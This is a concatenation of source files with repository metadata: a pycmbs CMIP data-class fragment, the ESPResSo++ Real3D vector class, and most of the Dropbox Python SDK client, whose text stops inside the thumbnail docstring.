name: TBD todo
shift_lon: specifies if longitudes of data need to be shifted
kwargs: other keyword arguments
"""
super(CMIP3Data, self).__init__(data_dir, model, experiment, dic_variables, name=model, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP3'
self._unique_name = self._get_unique_name()
|
pygeo/pycmbs
|
pycmbs/benchmarking/models/cmip5.py
|
Python
|
mit
| 20,505
|
[
"NetCDF"
] |
239baabaaa68802993926ffab0b3fc5bd297bf29429f69c7d9483a0087004cda
|
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
*******************
**espresso.Real3D**
*******************
"""
from _espresso import Real3D
from espresso import esutil
# This injects additional methods into the Real3D class and pulls it
# into this module
class __Real3D(Real3D) :
"""Basic 3D floating point vector as used by ESPResSo++.
"""
__metaclass__ = esutil.ExtendBaseClass
__originit = Real3D.__init__
def __init__(self, *args):
if len(args) == 0:
x = y = z = 0.0
elif len(args) == 1:
arg0 = args[0]
if isinstance(arg0, Real3D):
x = arg0.x
y = arg0.y
z = arg0.z
# test whether the argument is iterable and has 3 elements
elif hasattr(arg0, '__iter__') and len(arg0) == 3:
x, y, z = arg0
elif isinstance(arg0, float) or isinstance(arg0, int):
x = y = z = arg0
else :
raise TypeError("Cannot initialize Real3D from %s" % (args))
elif len(args) == 3 :
x, y, z = args
else :
raise TypeError("Cannot initialize Real3D from %s" % (args))
return self.__originit(x, y, z)
# create setters and getters
@property
def x(self): return self[0]
@x.setter
def x(self, v): self[0] = v
@property
def y(self) : return self[1]
@y.setter
def y(self, v) : self[1] = v
@property
def z(self) : return self[2]
@z.setter
def z(self, v) : self[2] = v
# string conversion
def __str__(self) :
return str((self[0], self[1], self[2]))
def __repr__(self) :
return 'Real3D' + str(self)
def toReal3DFromVector(*args):
"""Try to convert the arguments to a Real3D.
This function will only convert to a Real3D if x, y and z are
specified."""
if len(args) == 1:
arg0 = args[0]
if isinstance(arg0, Real3D):
return arg0
elif hasattr(arg0, '__iter__') and len(arg0) == 3:
return Real3D(*args)
elif len(args) == 3:
return Real3D(*args)
raise TypeError("Specify x, y and z.")
def toReal3D(*args):
"""Try to convert the arguments to a Real3D, returns the argument,
if it is already a Real3D."""
if len(args) == 1 and isinstance(args[0], Real3D):
return args[0]
else:
return Real3D(*args)
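# Example usage (a minimal sketch):
#   v = Real3D(1.0, 2.0, 3.0)      # from three floats
#   w = Real3D(0.5)                # -> (0.5, 0.5, 0.5)
#   u = toReal3D((1.0, 2.0, 3.0))  # from any 3-element iterable
#   v.x, v.y, v.z                  # component access via the injected properties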
|
BackupTheBerlios/espressopp
|
src/Real3D.py
|
Python
|
gpl-3.0
| 3,262
|
[
"ESPResSo"
] |
57a3b9b43297f0bb8e87ae576f2976bd298fc8c47b13b54e72b361678be7570f
|
from __future__ import absolute_import
import base64
import re
import os
import sys
import urllib
PY3 = sys.version_info[0] == 3
if PY3:
from io import StringIO
basestring = str
else:
from StringIO import StringIO
try:
import json
except ImportError:
import simplejson as json
from .rest import ErrorResponse, RESTClient, params_to_urlencoded
from .session import BaseSession, DropboxSession, DropboxOAuth2Session
def format_path(path):
"""Normalize path for use with the Dropbox API.
This function turns multiple adjacent slashes into single
slashes, then ensures that there's a leading slash but
not a trailing slash.
"""
if not path:
return path
path = re.sub(r'/+', '/', path)
    if path == '/':
        # use the text type of the input; `unicode` exists only on Python 2
        return (u"" if isinstance(path, (str if PY3 else unicode)) else "")
    else:
        return '/' + path.strip('/')
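# Examples of the normalization performed by format_path():
#   format_path('a//b/')  -> '/a/b'
#   format_path('/')      -> ''   (root maps to the empty string)
#   format_path('')       -> ''   (falsy input is returned unchanged)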
class DropboxClient(object):
"""
This class lets you make Dropbox API calls. You'll need to obtain an
OAuth 2 access token first. You can get an access token using either
:class:`DropboxOAuth2Flow` or :class:`DropboxOAuth2FlowNoRedirect`.
All of the API call methods can raise a :class:`dropbox.rest.ErrorResponse` exception if
the server returns a non-200 or invalid HTTP response. Note that a 401
return status at any point indicates that the access token you're using
is no longer valid and the user must be put through the OAuth 2
authorization flow again.
"""
def __init__(self, oauth2_access_token, locale=None, rest_client=None):
"""Construct a ``DropboxClient`` instance.
Parameters
oauth2_access_token
An OAuth 2 access token (string). For backwards compatibility this may
also be a DropboxSession object (see :meth:`create_oauth2_access_token()`).
locale
The locale of the user of your application. For example "en" or "en_US".
Some API calls return localized data and error messages; this setting
tells the server which locale to use. By default, the server uses "en_US".
rest_client
Optional :class:`dropbox.rest.RESTClient`-like object to use for making
requests.
"""
if rest_client is None: rest_client = RESTClient
if isinstance(oauth2_access_token, basestring):
if not _OAUTH2_ACCESS_TOKEN_PATTERN.match(oauth2_access_token):
raise ValueError("invalid format for oauth2_access_token: %r"
% (oauth2_access_token,))
self.session = DropboxOAuth2Session(oauth2_access_token, locale)
elif isinstance(oauth2_access_token, DropboxSession):
# Backwards compatibility with OAuth 1
if locale is not None:
raise ValueError("The 'locale' parameter to DropboxClient is only useful "
"when also passing in an OAuth 2 access token")
self.session = oauth2_access_token
else:
raise ValueError("'oauth2_access_token' must either be a string or a DropboxSession")
self.rest_client = rest_client
def request(self, target, params=None, method='POST',
content_server=False, notification_server=False):
"""
An internal method that builds the url, headers, and params for a Dropbox API request.
It is exposed if you need to make API calls not implemented in this library or if you
need to debug requests.
Parameters
target
The target URL with leading slash (e.g. '/files').
params
A dictionary of parameters to add to the request.
method
An HTTP method (e.g. 'GET' or 'POST').
content_server
A boolean indicating whether the request is to the
API content server, for example to fetch the contents of a file
rather than its metadata.
notification_server
A boolean indicating whether the request is to the API notification
server, for example for longpolling.
Returns
A tuple of ``(url, params, headers)`` that should be used to make the request.
OAuth will be added as needed within these fields.
"""
assert method in ['GET','POST', 'PUT'], "Only 'GET', 'POST', and 'PUT' are allowed."
assert not (content_server and notification_server), \
"Cannot construct request simultaneously for content and notification servers."
if params is None:
params = {}
if content_server:
host = self.session.API_CONTENT_HOST
elif notification_server:
host = self.session.API_NOTIFICATION_HOST
else:
host = self.session.API_HOST
base = self.session.build_url(host, target)
headers, params = self.session.build_access_headers(method, base, params)
if method in ('GET', 'PUT'):
url = self.session.build_url(host, target, params)
else:
url = self.session.build_url(host, target)
return url, params, headers
def account_info(self):
"""Retrieve information about the user's account.
Returns
A dictionary containing account information.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#account-info
"""
url, params, headers = self.request("/account/info", method='GET')
return self.rest_client.GET(url, headers)
def disable_access_token(self):
"""
Disable the access token that this ``DropboxClient`` is using. If this call
succeeds, further API calls using this object will fail.
"""
url, params, headers = self.request("/disable_access_token", method='POST')
return self.rest_client.POST(url, params, headers)
def create_oauth2_access_token(self):
"""
If this ``DropboxClient`` was created with an OAuth 1 access token, this method
can be used to create an equivalent OAuth 2 access token. This can be used to
upgrade your app's existing access tokens from OAuth 1 to OAuth 2.
Example::
from dropbox.client import DropboxClient
from dropbox.session import DropboxSession
session = DropboxSession(APP_KEY, APP_SECRET)
access_key, access_secret = '123abc', 'xyz456' # Previously obtained OAuth 1 credentials
session.set_token(access_key, access_secret)
client = DropboxClient(session)
token = client.create_oauth2_access_token()
# Optionally, create a new client using the new token
new_client = DropboxClient(token)
"""
if not isinstance(self.session, DropboxSession):
raise ValueError("This call requires a DropboxClient that is configured with an "
"OAuth 1 access token.")
url, params, headers = self.request("/oauth2/token_from_oauth1", method='POST')
r = self.rest_client.POST(url, params, headers)
return r['access_token']
def get_chunked_uploader(self, file_obj, length):
"""Creates a :class:`ChunkedUploader` to upload the given file-like object.
Parameters
file_obj
The file-like object which is the source of the data
being uploaded.
length
The number of bytes to upload.
The expected use of this function is as follows::
bigFile = open("data.txt", 'rb')
uploader = myclient.get_chunked_uploader(bigFile, size)
print "uploading: ", size
while uploader.offset < size:
try:
upload = uploader.upload_chunked()
            except rest.ErrorResponse as e:
# perform error handling and retry logic
uploader.finish('/bigFile.txt')
The SDK leaves the error handling and retry logic to the developer
to implement, as the exact requirements will depend on the application
involved.
"""
return ChunkedUploader(self, file_obj, length)
def upload_chunk(self, file_obj, length=None, offset=0, upload_id=None):
"""Uploads a single chunk of data from a string or file-like object. The majority of users
should use the :class:`ChunkedUploader` object, which provides a simpler interface to the
chunked_upload API endpoint.
Parameters
file_obj
The source of the chunk to upload; a file-like object or a string.
length
This argument is ignored but still present for backward compatibility reasons.
offset
The byte offset to which this source data corresponds in the original file.
upload_id
The upload identifier for which this chunk should be uploaded,
returned by a previous call, or None to start a new upload.
Returns
            A tuple of ``(offset, upload_id)``:
            offset
                The offset at which the next chunk should be uploaded.
            upload_id
                A string used to identify the upload for subsequent calls to :meth:`upload_chunk()`
                and :meth:`commit_chunked_upload()`.
"""
params = dict()
if upload_id:
params['upload_id'] = upload_id
params['offset'] = offset
url, ignored_params, headers = self.request("/chunked_upload", params,
method='PUT', content_server=True)
try:
reply = self.rest_client.PUT(url, file_obj, headers)
return reply['offset'], reply['upload_id']
except ErrorResponse as e:
raise e
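    # A hedged sketch of driving upload_chunk() by hand (most users should
    # prefer ChunkedUploader; ``client`` and ``big_file`` are hypothetical):
    #   offset, upload_id = 0, None
    #   while True:
    #       chunk = big_file.read(4 * 1024 * 1024)  # 4 MB per request
    #       if not chunk:
    #           break
    #       offset, upload_id = client.upload_chunk(StringIO(chunk), offset=offset,
    #                                               upload_id=upload_id)
    #   client.commit_chunked_upload('auto/big_file.bin', upload_id)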
def commit_chunked_upload(self, full_path, upload_id, overwrite=False, parent_rev=None):
"""Commit the previously uploaded chunks for the given path.
Parameters
full_path
The full path to which the chunks are uploaded, *including the file name*.
If the destination folder does not yet exist, it will be created.
upload_id
The chunked upload identifier, previously returned from upload_chunk.
overwrite
Whether to overwrite an existing file at the given path. (Default ``False``.)
If overwrite is False and a file already exists there, Dropbox
will rename the upload to make sure it doesn't overwrite anything.
You need to check the metadata returned for the new name.
This field should only be True if your intent is to potentially
clobber changes to a file that you don't know about.
parent_rev
Optional rev field from the 'parent' of this upload.
If your intent is to update the file at the given path, you should
pass the parent_rev parameter set to the rev value from the most recent
metadata you have of the existing file at that path. If the server
has a more recent version of the file at the specified path, it will
automatically rename your uploaded file, spinning off a conflict.
Using this parameter effectively causes the overwrite parameter to be ignored.
The file will always be overwritten if you send the most recent parent_rev,
and it will never be overwritten if you send a less recent one.
Returns
A dictionary containing the metadata of the newly committed file.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#commit-chunked-upload
"""
params = {
'upload_id': upload_id,
'overwrite': overwrite,
}
if parent_rev is not None:
params['parent_rev'] = parent_rev
url, params, headers = self.request("/commit_chunked_upload/%s" % full_path,
params, content_server=True)
return self.rest_client.POST(url, params, headers)
def put_file(self, full_path, file_obj, overwrite=False, parent_rev=None):
"""Upload a file.
A typical use case would be as follows::
f = open('working-draft.txt', 'rb')
response = client.put_file('/magnum-opus.txt', f)
print "uploaded:", response
which would return the metadata of the uploaded file, similar to::
{
'bytes': 77,
'icon': 'page_white_text',
'is_dir': False,
'mime_type': 'text/plain',
'modified': 'Wed, 20 Jul 2011 22:04:50 +0000',
'path': '/magnum-opus.txt',
'rev': '362e2029684fe',
'revision': 221922,
'root': 'dropbox',
'size': '77 bytes',
'thumb_exists': False
}
Parameters
full_path
The full path to upload the file to, *including the file name*.
If the destination folder does not yet exist, it will be created.
file_obj
A file-like object to upload. If you would like, you can pass a string as file_obj.
overwrite
Whether to overwrite an existing file at the given path. (Default ``False``.)
If overwrite is False and a file already exists there, Dropbox
will rename the upload to make sure it doesn't overwrite anything.
You need to check the metadata returned for the new name.
This field should only be True if your intent is to potentially
clobber changes to a file that you don't know about.
parent_rev
Optional rev field from the 'parent' of this upload.
If your intent is to update the file at the given path, you should
pass the parent_rev parameter set to the rev value from the most recent
metadata you have of the existing file at that path. If the server
has a more recent version of the file at the specified path, it will
automatically rename your uploaded file, spinning off a conflict.
Using this parameter effectively causes the overwrite parameter to be ignored.
The file will always be overwritten if you send the most recent parent_rev,
and it will never be overwritten if you send a less recent one.
Returns
A dictionary containing the metadata of the newly uploaded file.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#files-put
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 503: User over quota.
"""
path = "/files_put/%s%s" % (self.session.root, format_path(full_path))
params = {
'overwrite': bool(overwrite),
}
if parent_rev is not None:
params['parent_rev'] = parent_rev
url, params, headers = self.request(path, params, method='PUT', content_server=True)
return self.rest_client.PUT(url, file_obj, headers)
def get_file(self, from_path, rev=None, start=None, length=None):
"""Download a file.
Example::
out = open('magnum-opus.txt', 'wb')
with client.get_file('/magnum-opus.txt') as f:
out.write(f.read())
which would download the file ``magnum-opus.txt`` and write the contents into
the file ``magnum-opus.txt`` on the local filesystem.
Parameters
from_path
The path to the file to be downloaded.
rev
Optional previous rev value of the file to be downloaded.
start
Optional byte value from which to start downloading.
length
Optional length in bytes for partially downloading the file. If ``length`` is
specified but ``start`` is not, then the last ``length`` bytes will be downloaded.
Returns
A :class:`dropbox.rest.RESTResponse` that is the HTTP response for
the API request. It is a file-like object that can be read from. You
must call ``close()`` when you're done.
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at the given path, or the file that was there was deleted.
- 200: Request was okay but response was malformed in some way.
"""
path = "/files/%s%s" % (self.session.root, format_path(from_path))
params = {}
if rev is not None:
params['rev'] = rev
url, params, headers = self.request(path, params, method='GET', content_server=True)
if start is not None:
if length:
headers['Range'] = 'bytes=%s-%s' % (start, start + length - 1)
else:
headers['Range'] = 'bytes=%s-' % start
elif length is not None:
headers['Range'] = 'bytes=-%s' % length
return self.rest_client.request("GET", url, headers=headers, raw_response=True)
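    # e.g. get_file('/big.bin', start=0, length=1024) sends 'Range: bytes=0-1023',
    # while get_file('/big.bin', length=1024) sends 'Range: bytes=-1024'
    # (i.e. the final kilobyte of the file)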
def get_file_and_metadata(self, from_path, rev=None):
"""Download a file alongwith its metadata.
Acts as a thin wrapper around get_file() (see :meth:`get_file()` comments for
more details)
A typical usage looks like this::
out = open('magnum-opus.txt', 'wb')
f, metadata = client.get_file_and_metadata('/magnum-opus.txt')
with f:
out.write(f.read())
Parameters
from_path
The path to the file to be downloaded.
rev
Optional previous rev value of the file to be downloaded.
Returns
A pair of ``(response, metadata)``:
response
A :class:`dropbox.rest.RESTResponse` that is the HTTP response for
the API request. It is a file-like object that can be read from. You
must call ``close()`` when you're done.
metadata
A dictionary containing the metadata of the file (see
https://www.dropbox.com/developers/core/docs#metadata for details).
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at the given path, or the file that was there was deleted.
- 200: Request was okay but response was malformed in some way.
"""
file_res = self.get_file(from_path, rev)
metadata = DropboxClient.__parse_metadata_as_dict(file_res)
return file_res, metadata
@staticmethod
def __parse_metadata_as_dict(dropbox_raw_response):
# Parses file metadata from a raw dropbox HTTP response, raising a
# dropbox.rest.ErrorResponse if parsing fails.
metadata = None
        for header, header_val in dropbox_raw_response.getheaders().items():  # works on both Python 2 and 3
if header.lower() == 'x-dropbox-metadata':
try:
metadata = json.loads(header_val)
except ValueError:
raise ErrorResponse(dropbox_raw_response)
if not metadata: raise ErrorResponse(dropbox_raw_response)
return metadata
def delta(self, cursor=None, path_prefix=None, include_media_info=False):
"""A way of letting you keep up with changes to files and folders in a
user's Dropbox. You can periodically call delta() to get a list of "delta
entries", which are instructions on how to update your local state to
match the server's state.
Parameters
cursor
On the first call, omit this argument (or pass in ``None``). On
subsequent calls, pass in the ``cursor`` string returned by the previous
call.
path_prefix
If provided, results will be limited to files and folders
whose paths are equal to or under ``path_prefix``. The ``path_prefix`` is
fixed for a given cursor. Whatever ``path_prefix`` you use on the first
``delta()`` must also be passed in on subsequent calls that use the returned
cursor.
include_media_info
If True, delta will return additional media info for photos and videos
(the time a photo was taken, the GPS coordinates of a photo, etc.). There
is a delay between when a file is uploaded to Dropbox and when this
information is available; delta will only include a file in the changelist
once its media info is ready. The value you use on the first ``delta()`` must
also be passed in on subsequent calls that use the returned cursor.
Returns
A dict with four keys:
entries
A list of "delta entries" (described below).
reset
                If ``True``, you should reset your local state to an empty folder
                before processing the list of delta entries. This is ``True`` only
in rare situations.
cursor
A string that is used to keep track of your current state.
On the next call to delta(), pass in this value to return entries
that were recorded since the cursor was returned.
has_more
If ``True``, then there are more entries available; you can
call delta() again immediately to retrieve those entries. If ``False``,
then wait at least 5 minutes (preferably longer) before checking again.
Delta Entries: Each entry is a 2-item list of one of following forms:
- [*path*, *metadata*]: Indicates that there is a file/folder at the given
              path. You should add the entry to your local state. (The *metadata*
value is the same as what would be returned by the ``metadata()`` call.)
- If the new entry includes parent folders that don't yet exist in your
local state, create those parent folders in your local state. You
will eventually get entries for those parent folders.
- If the new entry is a file, replace whatever your local state has at
*path* with the new entry.
- If the new entry is a folder, check what your local state has at
*path*. If it's a file, replace it with the new entry. If it's a
folder, apply the new *metadata* to the folder, but do not modify
the folder's children.
- [*path*, ``None``]: Indicates that there is no file/folder at the *path* on
Dropbox. To update your local state to match, delete whatever is at *path*,
including any children (you will sometimes also get "delete" delta entries
for the children, but this is not guaranteed). If your local state doesn't
have anything at *path*, ignore this entry.
Remember: Dropbox treats file names in a case-insensitive but case-preserving
way. To facilitate this, the *path* strings above are lower-cased versions of
the actual path. The *metadata* dicts have the original, case-preserved path.
"""
path = "/delta"
params = {'include_media_info': include_media_info}
if cursor is not None:
params['cursor'] = cursor
if path_prefix is not None:
params['path_prefix'] = path_prefix
url, params, headers = self.request(path, params)
return self.rest_client.POST(url, params, headers)
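    # A minimal client-side sketch of consuming delta entries, per the
    # docstring above (``client`` and ``local_state`` are hypothetical):
    #   cursor = None
    #   while True:
    #       result = client.delta(cursor)
    #       if result['reset']:
    #           local_state.clear()
    #       for lc_path, metadata in result['entries']:
    #           if metadata is not None:
    #               local_state[lc_path] = metadata   # add/update file or folder
    #           else:
    #               local_state.pop(lc_path, None)    # deleted on Dropbox
    #       cursor = result['cursor']
    #       if not result['has_more']:
    #           break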
def longpoll_delta(self, cursor, timeout=None):
"""A long-poll endpoint to wait for changes on an account. In conjunction with
:meth:`delta()`, this call gives you a low-latency way to monitor an account for
file changes.
Note that this call goes to ``api-notify.dropbox.com`` instead of ``api.dropbox.com``.
Unlike most other API endpoints, this call does not require OAuth authentication.
The passed-in cursor can only be acquired via an authenticated call to :meth:`delta()`.
Parameters
cursor
A delta cursor as returned from a call to :meth:`delta()`. Note that a cursor
returned from a call to :meth:`delta()` with ``include_media_info=True`` is
incompatible with ``longpoll_delta()`` and an error will be returned.
timeout
An optional integer indicating a timeout, in seconds. The default value is
30 seconds, which is also the minimum allowed value. The maximum is 480
seconds. The request will block for at most this length of time, plus up
to 90 seconds of random jitter added to avoid the thundering herd problem.
Care should be taken when using this parameter, as some network
infrastructure does not support long timeouts.
Returns
The connection will block until there are changes available or a timeout occurs.
The response will be a dictionary that looks like the following example::
{"changes": false, "backoff": 60}
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#longpoll-delta
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (generally due to an invalid parameter; check e.error for details).
"""
path = "/longpoll_delta"
params = {'cursor': cursor}
if timeout is not None:
params['timeout'] = timeout
url, params, headers = self.request(path, params, method='GET', notification_server=True)
return self.rest_client.GET(url, headers)
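    # A hedged sketch of pairing longpoll_delta() with delta() (``client``
    # and ``cursor`` are assumed to exist; see delta() above):
    #   result = client.longpoll_delta(cursor, timeout=60)
    #   if result.get('backoff'):
    #       time.sleep(result['backoff'])   # the server asked us to back off
    #   if result['changes']:
    #       changes = client.delta(cursor)  # fetch the actual entries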
def create_copy_ref(self, from_path):
"""Creates and returns a copy ref for a specific file. The copy ref can be
used to instantly copy that file to the Dropbox of another account.
Parameters
            from_path
                The path to the file for which a copy ref should be created.
Returns
A dictionary that looks like the following example::
{"expires": "Fri, 31 Jan 2042 21:01:05 +0000", "copy_ref": "z1X6ATl6aWtzOGq0c3g5Ng"}
"""
path = "/copy_ref/%s%s" % (self.session.root, format_path(from_path))
url, params, headers = self.request(path, {}, method='GET')
return self.rest_client.GET(url, headers)
def add_copy_ref(self, copy_ref, to_path):
"""Adds the file referenced by the copy ref to the specified path
Parameters
copy_ref
A copy ref string that was returned from a create_copy_ref call.
The copy_ref can be created from any other Dropbox account, or from the same account.
            to_path
                The path to where the file will be created.
Returns
A dictionary containing the metadata of the new copy of the file.
"""
path = "/fileops/copy"
params = {'from_copy_ref': copy_ref,
'to_path': format_path(to_path),
'root': self.session.root}
url, params, headers = self.request(path, params)
return self.rest_client.POST(url, params, headers)
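    # A minimal sketch of copying a file between two accounts via a copy ref
    # (``client_a`` and ``client_b`` are hypothetical DropboxClient instances):
    #   ref = client_a.create_copy_ref('/song.mp3')['copy_ref']
    #   metadata = client_b.add_copy_ref(ref, '/song.mp3')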
def file_copy(self, from_path, to_path):
"""Copy a file or folder to a new location.
Parameters
from_path
The path to the file or folder to be copied.
to_path
The destination path of the file or folder to be copied.
This parameter should include the destination filename (e.g.
from_path: '/test.txt', to_path: '/dir/test.txt'). If there's
already a file at the to_path it will raise an ErrorResponse.
Returns
A dictionary containing the metadata of the new copy of the file or folder.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#fileops-copy
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 403: An invalid copy operation was attempted
(e.g. there is already a file at the given destination,
or trying to copy a shared folder).
- 404: No file was found at given from_path.
- 503: User over storage quota.
"""
params = {'root': self.session.root,
'from_path': format_path(from_path),
'to_path': format_path(to_path),
}
url, params, headers = self.request("/fileops/copy", params)
return self.rest_client.POST(url, params, headers)
def file_create_folder(self, path):
"""Create a folder.
Parameters
path
The path of the new folder.
Returns
A dictionary containing the metadata of the newly created folder.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#fileops-create-folder
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 403: A folder at that path already exists.
"""
params = {'root': self.session.root, 'path': format_path(path)}
url, params, headers = self.request("/fileops/create_folder", params)
return self.rest_client.POST(url, params, headers)
def file_delete(self, path):
"""Delete a file or folder.
Parameters
path
The path of the file or folder.
Returns
A dictionary containing the metadata of the just deleted file.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#fileops-delete
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at the given path.
"""
params = {'root': self.session.root, 'path': format_path(path)}
url, params, headers = self.request("/fileops/delete", params)
return self.rest_client.POST(url, params, headers)
def file_move(self, from_path, to_path):
"""Move a file or folder to a new location.
Parameters
from_path
The path to the file or folder to be moved.
to_path
The destination path of the file or folder to be moved.
This parameter should include the destination filename (e.g. if
``from_path`` is ``'/test.txt'``, ``to_path`` might be
``'/dir/test.txt'``). If there's already a file at the
``to_path`` it will raise an ErrorResponse.
Returns
A dictionary containing the metadata of the new copy of the file or folder.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#fileops-move
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 403: An invalid move operation was attempted
(e.g. there is already a file at the given destination,
or moving a shared folder into a shared folder).
- 404: No file was found at given from_path.
- 503: User over storage quota.
"""
params = {'root': self.session.root,
'from_path': format_path(from_path),
'to_path': format_path(to_path)}
url, params, headers = self.request("/fileops/move", params)
return self.rest_client.POST(url, params, headers)
def metadata(self, path, list=True, file_limit=25000, hash=None,
rev=None, include_deleted=False, include_media_info=False):
"""Retrieve metadata for a file or folder.
A typical use would be::
folder_metadata = client.metadata('/')
print "metadata:", folder_metadata
which would return the metadata of the root folder. This
will look something like::
{
'bytes': 0,
'contents': [
{
'bytes': 0,
'icon': 'folder',
'is_dir': True,
'modified': 'Thu, 25 Aug 2011 00:03:15 +0000',
'path': '/Sample Folder',
'rev': '803beb471',
'revision': 8,
'root': 'dropbox',
'size': '0 bytes',
'thumb_exists': False
},
{
'bytes': 77,
'icon': 'page_white_text',
'is_dir': False,
'mime_type': 'text/plain',
'modified': 'Wed, 20 Jul 2011 22:04:50 +0000',
'path': '/magnum-opus.txt',
'rev': '362e2029684fe',
'revision': 221922,
'root': 'dropbox',
'size': '77 bytes',
'thumb_exists': False
}
],
'hash': 'efdac89c4da886a9cece1927e6c22977',
'icon': 'folder',
'is_dir': True,
'path': '/',
'root': 'app_folder',
'size': '0 bytes',
'thumb_exists': False
}
In this example, the root folder contains two things: ``Sample Folder``,
        which is a folder, and ``/magnum-opus.txt``, which is a text file 77 bytes long.
Parameters
path
The path to the file or folder.
list
Whether to list all contained files (only applies when
path refers to a folder).
file_limit
The maximum number of file entries to return within
a folder. If the number of files in the folder exceeds this
limit, an exception is raised. The server will return at max
25,000 files within a folder.
hash
Every folder listing has a hash parameter attached that
can then be passed back into this function later to save on
bandwidth. Rather than returning an unchanged folder's contents,
the server will instead return a 304.
rev
Optional revision of the file to retrieve the metadata for.
This parameter only applies for files. If omitted, you'll receive
the most recent revision metadata.
include_deleted
When listing contained files, include files that have been deleted.
include_media_info
If True, includes additional media info for photos and videos if
available (the time a photo was taken, the GPS coordinates of a photo,
etc.).
Returns
A dictionary containing the metadata of the file or folder
(and contained files if appropriate).
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#metadata
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
            - 304: Current folder hash matches the hash parameter, so contents are unchanged.
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at given path.
- 406: Too many file entries to return.
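        To save bandwidth on repeated listings, pass the ``hash`` from an
        earlier response back in and handle the 304. A sketch, assuming an
        authenticated ``client`` and a previously stored ``last_hash``::

            from dropbox.rest import ErrorResponse

            try:
                listing = client.metadata('/Photos', hash=last_hash)
            except ErrorResponse as e:
                if e.status == 304:
                    pass  # folder contents unchanged since the last call
                else:
                    raise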
"""
path = "/metadata/%s%s" % (self.session.root, format_path(path))
params = {'file_limit': file_limit,
'list': 'true',
'include_deleted': include_deleted,
'include_media_info': include_media_info,
}
if not list:
params['list'] = 'false'
if hash is not None:
params['hash'] = hash
if rev:
params['rev'] = rev
url, params, headers = self.request(path, params, method='GET')
return self.rest_client.GET(url, headers)
    def preview(self, from_path, rev=None):
        """Download a document preview for a file.
        Returns a raw HTTP response (a file-like object that can be read from;
        call ``close()`` when you're done), like :meth:`thumbnail()`.
        """
        path = "/previews/%s%s" % (self.session.root, format_path(from_path))
params = {}
if rev is not None:
params['rev'] = rev
url, params, headers = self.request(path, params, method='GET', content_server=True)
return self.rest_client.request("GET", url, headers=headers, raw_response=True)
def thumbnail(self, from_path, size='m', format='JPEG'):
"""Download a thumbnail for an image.
Parameters
from_path
The path to the file to be thumbnailed.
size
A string specifying the desired thumbnail size. Currently
supported sizes: ``"xs"`` (32x32), ``"s"`` (64x64), ``"m"`` (128x128),
            ``"l"`` (640x480), ``"xl"`` (1024x768).
Check https://www.dropbox.com/developers/core/docs#thumbnails for
more details.
format
The image format the server should use for the returned
thumbnail data. Either ``"JPEG"`` or ``"PNG"``.
Returns
A :class:`dropbox.rest.RESTResponse` that is the HTTP response for
the API request. It is a file-like object that can be read from. You
must call ``close()`` when you're done.
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No file was found at the given from_path,
or files of that type cannot be thumbnailed.
- 415: Image is invalid and cannot be thumbnailed.
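        A minimal sketch that saves a thumbnail to disk, assuming an
        authenticated ``client``::

            res = client.thumbnail('/photo.jpg', size='l')
            try:
                with open('thumb.jpg', 'wb') as out:
                    out.write(res.read())
            finally:
                res.close()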
"""
assert format in ['JPEG', 'PNG'], \
"expected a thumbnail format of 'JPEG' or 'PNG', got %s" % format
path = "/thumbnails/%s%s" % (self.session.root, format_path(from_path))
url, params, headers = self.request(path, {'size': size, 'format': format},
method='GET', content_server=True)
return self.rest_client.request("GET", url, headers=headers, raw_response=True)
    def thumbnail_and_metadata(self, from_path, size='m', format='JPEG'):
        """Download a thumbnail for an image along with its metadata.
        Acts as a thin wrapper around :meth:`thumbnail()` (see its
        documentation for more details).
Parameters
from_path
The path to the file to be thumbnailed.
size
A string specifying the desired thumbnail size. See :meth:`thumbnail()`
for details.
format
The image format the server should use for the returned
thumbnail data. Either ``"JPEG"`` or ``"PNG"``.
Returns
A pair of ``(response, metadata)``:
response
A :class:`dropbox.rest.RESTResponse` that is the HTTP response for
the API request. It is a file-like object that can be read from. You
must call ``close()`` when you're done.
metadata
A dictionary containing the metadata of the file whose thumbnail
was downloaded (see https://www.dropbox.com/developers/core/docs#metadata
for details).
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
